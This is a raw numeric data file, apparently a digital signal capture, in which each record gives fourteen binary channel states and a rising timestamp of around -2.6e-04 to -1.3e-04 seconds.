0,1,1,1,0,1,0,0,0,1,0,0,1,0,-2.6190800e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6187600e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6185200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6182800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6180400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6178000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6175600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6172800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6170400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6168000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6165200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6162800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6160400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6158000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6155600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6153200e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6150800e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6147600e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6145200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6142800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6138000e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6135600e-04 0,1,1,1,0,1,0,0,0,1,0,0,0,0,-2.6134800e-04 0,1,1,1,0,1,0,0,0,1,0,0,1,0,-2.6132800e-04 0,1,1,1,0,1,0,0,0,1,0,0,0,0,-2.6130800e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6129600e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6128000e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6125200e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6122800e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6120400e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6118000e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6115600e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6112800e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6110800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6108000e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6105200e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6102800e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6100400e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6098000e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6095600e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6093200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6090800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6087600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6085200e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6083200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6080400e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6078000e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6075600e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6073200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6070800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6067600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6065200e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6063200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6060400e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6058000e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6055600e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6053200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6050800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6045200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6043200e-04 0,1,1,1,0,1,0,0,0,1,0,0,0,0,-2.6042400e-04 0,1,1,1,0,1,0,0,0,1,0,0,1,0,-2.6040400e-04 0,1,1,1,0,1,0,0,0,1,0,0,0,0,-2.6038000e-04 0,1,1,1,0,1,0,0,0,1,0,0,1,0,-2.6033200e-04 0,1,1,1,0,1,0,0,0,1,0,0,0,0,-2.6030800e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6030000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6027600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6025200e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6023200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6020400e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6018000e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6015600e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6013200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6010800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6007600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6005200e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6003200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6000400e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5998000e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5995600e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5993200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5990800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5988000e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5985200e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5983200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5980400e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5978000e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5975600e-04 0,1,1,1,0,1,0,0,0,1,0,0,0,0,-2.5974800e-04 0,1,1,1,0,1,0,0,0,1,0,0,1,0,-2.5970800e-04 0,1,1,1,0,1,0,0,0,0,0,0,0,0,-2.5967600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5967200e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5965200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5963200e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5960400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5958000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5955600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5952800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5950800e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5947600e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5945200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5942800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5940400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5938000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5935600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5932800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5930400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5928000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5925200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5922800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5920400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5918000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5915600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5913200e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5910400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5907600e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5905200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5902800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5900400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5898000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5895600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5892800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5890400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5887600e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5885200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5882800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5880400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5878000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5875600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5872800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5870400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5868000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5865200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5862800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5860400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5858000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5855600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5853200e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5850400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5848000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5845200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5842800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5840400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5838000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5835600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5833200e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5830400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5827600e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5825200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5822800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5820400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5818000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5815600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5812800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5810400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5808000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5805200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5802800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5800400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5798000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5795600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5793200e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5790400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5788000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5785200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5782800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5780400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5778000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5775600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5772800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5770400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5768000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5765200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5762800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5760400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5758000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5755600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5752800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5750400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5748000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5745200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5742800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5740400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5738000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5735600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5733200e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5730400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5728000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5725200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5722800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5720400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5718000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5715600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5713200e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5710400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5707600e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5705200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5702800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5700400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5698000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5695600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5692800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.5690400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.5688000e-04 0,1,1,1,0,1,0,0,0,1,0,0,0,0,-2.5687600e-04 0,1,1,1,0,1,0,0,0,1,0,0,0,1,-1.3216400e-04 1,1,1,1,0,1,0,0,0,1,0,0,0,1,-1.3190800e-04 1,1,1,1,0,1,0,0,0,1,0,1,0,1,-1.3188000e-04 1,1,1,1,0,1,0,0,0,1,0,0,0,1,-1.3185200e-04 1,1,1,1,0,1,0,0,0,1,0,0,1,1,-1.3154000e-04 1,1,1,1,0,1,0,0,0,1,0,0,0,1,-1.3151600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,1,-1.3150800e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,1,-1.3149200e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,1,-1.3146800e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,1,-1.3144400e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,1,-1.3141600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,1,-1.3139200e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,1,-1.3136400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,1,-1.3134000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,1,-1.3131600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,1,-1.3129200e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.3126800e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.3124000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.3121600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.3119200e-04 1,1,1,1,0,0,0,0,0,1,0,0,0,0,-1.3116400e-04 1,1,1,1,0,1,0,0,0,1,0,0,0,0,-1.3116000e-04 1,1,1,1,0,1,0,0,0,1,0,0,1,0,-1.3114000e-04 1,1,1,1,0,1,0,0,0,1,0,0,0,0,-1.3111600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.3110800e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.3109200e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.3106800e-04 1,1,1,1,0,1,0,0,0,1,0,0,0,0,-1.3106000e-04 1,1,1,1,0,1,0,0,0,1,0,0,1,0,-1.3101600e-04 1,1,1,1,0,1,0,0,0,1,0,0,0,0,-1.3098800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.3098400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.3096400e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.3094000e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.3091600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.3089200e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.3086800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.3084400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.3082000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.3079600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.3074000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.3071600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.3066800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.3064400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.3059200e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.3056800e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.3051600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.3049200e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.3046800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.3044400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.3042000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.3039600e-04 1,1,1,1,0,1,0,0,0,1,0,0,0,0,-1.3038800e-04 1,1,1,1,0,1,0,0,0,1,0,0,1,0,-1.3034000e-04 1,1,1,1,0,1,0,0,0,1,0,0,0,0,-1.3031600e-04 1,1,1,1,0,1,0,0,0,0,0,0,0,0,-1.3031200e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.3030800e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.3029200e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.3026800e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.3022000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.3019600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.3014400e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.3011600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.3006800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.3004400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.3002000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2999600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2996800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2994400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2989200e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2986800e-04 1,1,1,1,0,0,0,0,0,1,0,0,0,0,-1.2986400e-04 1,1,1,1,0,1,0,0,0,1,0,0,0,0,-1.2986000e-04 1,1,1,1,0,1,0,0,0,1,0,0,1,0,-1.2980800e-04 1,1,1,1,0,1,0,0,0,1,0,0,0,0,-1.2978400e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2977600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2973200e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2970800e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2966000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2963600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2960800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2958400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2955600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2953200e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2950800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2948400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2946000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2943600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2940800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2938400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2935600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2933200e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2928400e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2926000e-04 1,1,1,1,0,1,0,0,0,1,0,0,0,0,-1.2925200e-04 1,1,1,1,0,1,0,0,0,1,0,0,1,0,-1.2923600e-04 1,1,1,1,0,1,0,0,0,1,0,0,0,0,-1.2920800e-04 1,1,1,1,0,1,0,0,0,0,0,0,0,0,-1.2920400e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2920000e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2918400e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2915600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2913200e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2910800e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2906000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2903600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2900800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2898400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2893200e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2890800e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2885200e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2882800e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2878000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2875600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2872400e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2870000e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2867600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2865200e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2862800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2860400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2857600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2855200e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2852400e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2850000e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2847600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2845200e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2842800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2840400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2837600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2835200e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2832400e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2830000e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2827600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2825200e-04 1,1,1,1,0,1,0,0,0,1,0,0,0,0,-1.2824400e-04 1,1,1,1,0,1,0,0,0,1,0,0,1,0,-1.2822800e-04 1,1,1,1,0,1,0,0,0,1,0,0,0,0,-1.2820400e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2819600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2817600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2815200e-04 1,1,1,1,0,1,0,0,0,1,0,0,0,0,-1.2814800e-04 1,1,1,1,0,1,0,0,0,1,0,0,1,0,-1.2810000e-04 1,1,1,1,0,1,0,0,0,1,0,0,0,0,-1.2807600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2806800e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2805200e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2802800e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2800400e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2797600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2795200e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2792400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2790000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2787600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2782000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2780000e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2774800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2772400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2767600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2765200e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2760000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2757600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2754800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2752400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2750000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2747600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2742000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2740000e-04 1,1,1,1,0,1,0,0,0,1,0,0,0,0,-1.2739600e-04 1,1,1,1,0,1,0,0,0,1,0,0,1,0,-1.2734800e-04 1,1,1,1,0,1,0,0,0,1,0,0,0,0,-1.2732400e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2731600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2727600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2724800e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2719600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2717600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2714800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2712400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2710000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2707600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2704800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2702400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2699600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2697600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2694800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2692400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2690000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2687600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2684800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2682400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2679600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2677200e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2674800e-04 